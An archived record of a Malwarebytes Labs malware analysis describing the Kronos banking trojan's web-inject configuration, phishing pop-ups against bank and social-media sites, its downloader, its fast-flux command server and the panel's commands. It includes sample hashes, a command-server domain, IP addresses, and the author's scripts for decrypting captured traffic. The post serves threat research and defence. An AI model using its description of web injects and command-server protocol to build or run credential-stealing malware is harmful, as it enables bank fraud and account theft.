{
	"id": "9adc368e-eedb-44e6-8e9a-9d44658a1ae1",
	"created_at": "2026-04-06T00:18:30.893683Z",
	"updated_at": "2026-04-10T03:22:05.910304Z",
	"deleted_at": null,
	"sha1_hash": "4f9f4ad01d95f3ef744d33a618f5ae73fbb87bab",
	"title": "Inside the Kronos malware - part 2 | Malwarebytes Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 885726,
	"plain_text": "Inside the Kronos malware - part 2 | Malwarebytes Labs\r\nBy Malwarebytes Labs\r\nPublished: 2017-08-28 · Archived: 2026-04-05 13:44:37 UTC\r\nIn the previous part of the Kronos analysis, we took a look at the installation process of Kronos and explained the\r\ntechnical details of the tricks that this malware uses in order to remain more stealthy. Now we will move on to\r\nlook at the malicious actions that Kronos can perform.\r\nAnalyzed samples\r\nede01f7431543c1fef546f8e1d693a85 – downloader (a .doc with a malicious macro)\r\n2a550956263a22991c34f076f3160b49 – main bot (packed)\r\nSpecial thanks to @shotgunner101 and @chrisdoman for sharing the samples.\r\nConfiguration and targets\r\nKronos is known as a banking Trojan. For the purpose of enabling and configuring this feature, the bot may\r\ndownload from its CnC additional configuration file. After being fetched, it is stored in the installation folder in\r\nencrypted form. (It is worth to notice that when the config is sent over the network it is encrypted using AES CBC\r\nmode – but when it is stored on the disk, AES in ECB mode is used.)\r\nBelow you can see an example of the installation folder of Kronos, created in %APPDATA%/Microsoft . The folder\r\nname is further used as a\r\nBotId\r\n. Both stored files, the executable and the configuration, has the same name that differs only by the extension:\r\nHere you can see the captured configuration file in a decrypted form:\r\nhttps://gist.github.com/malwarezone/d6de3d53395849123596f5d9e68fe3a3#file-config-txt\r\nThe format of the configuration follows the standard defined by the famous Zeus malware.\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 1 of 14\n\nThe config specifies the external script that is going to be injected in the targeted website, as well as the place of\r\nthe injection. Below you can see a fragment of the configuration for a sample target – Wells Fargo Bank:\r\nIn the given example, the injected script is figrabber.js\r\nIt is hosted on the server of the attacker:\r\nThe current configuration targets several banks, but also steals credentials for popular services like Google,\r\nTwitter, and Facebook.\r\nIndeed, if we open the websites that are targeted by the malware we can see that the injects has been performed.\r\nThe fragments of code that were defined in the config are implanted in the source of a legitimate website. Some\r\nexamples included below:\r\nFacebook:\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 2 of 14\n\nCitibank:\r\nThe injected scripts are responsible for opening additional pop-up that is trying to phish the user and steal his/her\r\npersonal data:\r\nWells Fargo:\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 3 of 14\n\nMore cases, and their comparison with a normal site behavior before the infection, demonstrated on the video:\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 4 of 14\n\nThe form is customized to fit the theme of each page. However, its content is the same for each target. Overall, the\r\nattack is not very sophisticated and it will probably look suspicious to the more advanced users. It’s based purely\r\non social engineering – trying to convince a user to input all personal data that are necessary for banking\r\noperations:\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 5 of 14\n\nDownloader\r\nApart from infecting browsers and stealing the data, Kronos also has a downloader feature. During our tests, it\r\ndownloaded a new executable and saved it in the %TEMP% . Payloads are stored in the additional directory with the\r\nsame name as the main installation directory:\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 6 of 14\n\nDownloaded payload:\r\n6f7f79dd2a2bf58ba08d03c64ead5ced – nCBngA.exe\r\nThe payload is downloaded from Kronos CnC:\r\n…in unencrypted form:\r\nIn the analyzed case, downloaded payload was just an update of the Kronos bot. However, the same feature may\r\nalso be used for fetching and deploying other malware families.\r\nCommand and Controll (CnC) server\r\nIn the analyzed case, Kronos used Fast-Flux technique for its CnC. The domain was resolved to a different IP each\r\ntime. For example, the domain hjbkjbhkjhbkjhl.info was resolved to an IP address randomly picked from the\r\npool given below:\r\n46.175.146.50 46.172.209.210 47.188.161.114 74.109.250.65 77.122.51.88 77.122.51.88 89.25.31.94 89.18\r\nWatching the communication with the CnC, we observed queries to the site connect.php , with an optional\r\nparameter\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 7 of 14\n\na\r\n:\r\nconnect.php - initial beacon connect.php?a=0 - sending data to the CnC connect.php?a=1 - downloading\r\nCnC panel\r\nThanks to the code of the CnC panel that leaked online, we can have more insights on all the functionalities and\r\ntheir implementation. Like most of the malware panels, the Kronos panel is written in PHP and uses MySQL\r\ndatabase. Overview of the files:\r\nIt turns out, that in total the bot has three commands:\r\na=0\r\n– sends the grabbed page content\r\na=1\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 8 of 14\n\n– fetch the configuration file\r\na=2\r\n– send the logged windows\r\nBelow we can see the relevant fragments of the panel’s code (implemented inside connect.php ), responsible for\r\nparsing and storing the data uploaded by the respective commands.\r\nCommand #0 ( a=0 ):\r\nCommand #2 ( a=2 ):\r\nThe configuration that is sent to the bot is prepared by the following code:\r\nCommand #1 ( a=1 ):\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 9 of 14\n\nWe can also see very clearly how the config is encrypted – using AES in CBC mode, where the key is first 16\r\nbytes of md5 of the BotId (it confirms what researchers form Lexsi lab found by reverse engineering).\r\nHowever, AES is not the only cryptographic algorithm that is utilized by Kronos. Other commands use BlowFish\r\nin ECB mode:\r\nCommand #0 ( a=0 ):\r\nCommand #2 ( a=2 ):\r\nIn all cases, there is a variable called UniqueId that is used as a key. The\r\nUniqueId\r\nis nothing more but the BotId , that is sent in every POST request in XOR encoded form.\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 10 of 14\n\nYou can find the corresponding Python scripts for decoding the appropriate requests and responses here:\r\nhttps://github.com/hasherezade/malware_analysis/tree/master/kronos\r\nKronos comes also with option of adding some plugins, extending the core functionality:\r\nAs we may conclude, the plugins are capable of extending Kronos with some espionage capabilities, such as VNC\r\n(for viewing the desktop) and logging typed keystrokes.\r\nDecrypting the communication\r\nWith the help of prepared scripts (available here), we can decrypt the important elements of the communication\r\nbetween the Kronos bot and the CnC server. Let’s assume that we have a PCAP file with a captured traffic.\r\nThe BotId\r\nWe need to start from getting the Kronos BotId , because as we know it will be used to derive the encryption\r\nkeys. We will find it in the requests sent by the bot to its CnC (74 bytes long):\r\nAfter dumping the request, we can use the following script to decode it:\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 11 of 14\n\n./kronos_beacon_decoder.py --infile dump1.bin\r\nAs the output we will get the decoded beacon, consisting of:\r\n1. Hash of the configuration file (if no configuration file was present at the moment, this part will be filled\r\nwith “X” characters)\r\n2. The BotId\r\nExample:\r\nXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX{117BB161-6479-4624-858B-4D2CE81593A2}\r\nSo, in the demonstrated case the BotId is {117BB161-6479-4624-858B-4D2CE81593A2} .\r\nThe configuration\r\nHaving the BotId, we can move to decrypt the configuration. It arrives in the response to the a=1 request:\r\nExample of the request followed by the encrypted response from the CnC:\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 12 of 14\n\nAfter dumping the response, we can use another script to decode it, giving the BotId as a parameter:\r\n./kronos_a1_decoder.py --datafile dump2.bin --botid {117BB161-6479-4624-858B-4D2CE81593A2}\r\nAs a result, we will get the configuration file. Example of the decoded config:\r\nhttps://gist.github.com/malwarezone/a7fc13d4142da0c6a67b5e575156c720#file-config-txt\r\nThe sent reports\r\nSometimes we can find the Kronos bot reporting to the CnC in requests a=0 or a=2:\r\nExample of the encrypted request:\r\nFinding out what was exactly the data stolen by Kronos is not difficult if we dump the data and use the dedicated\r\nscript:\r\n./kronos_a02_decoder.py --datafile dump3.bin --botid {117BB161-6479-4624-858B-4D2CE81593A2}\r\nExample of the decoded report: https://gist.github.com/malwarezone/a03fa49de475dfbdb7c499ff2bbb3314#file-a0_req-txt\r\nConclusion\r\nIn terms of code quality, Kronos is written in a decent way, however its features are nothing novel. Although the\r\nbot got good reviews on underground forums, in terms of popularity it was always legging behind. Probably its\r\nrelatively high price was the important factor deciding why it lost with the competitors.\r\nAppendix\r\nSee also:\r\n/blog/cybercrime/2017/08/inside-kronos-malware/\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 13 of 14\n\nThis was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest\r\nin InfoSec. She loves going in details about malware and sharing threat information with the community. Check\r\nher out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.\r\nSource: https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/"
	],
	"report_names": [
		"inside-kronos-malware-p2"
	],
	"threat_actors": [],
	"ts_created_at": 1775434710,
	"ts_updated_at": 1775791325,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f9f4ad01d95f3ef744d33a618f5ae73fbb87bab.pdf",
		"text": "https://archive.orkl.eu/4f9f4ad01d95f3ef744d33a618f5ae73fbb87bab.txt",
		"img": "https://archive.orkl.eu/4f9f4ad01d95f3ef744d33a618f5ae73fbb87bab.jpg"
	}
}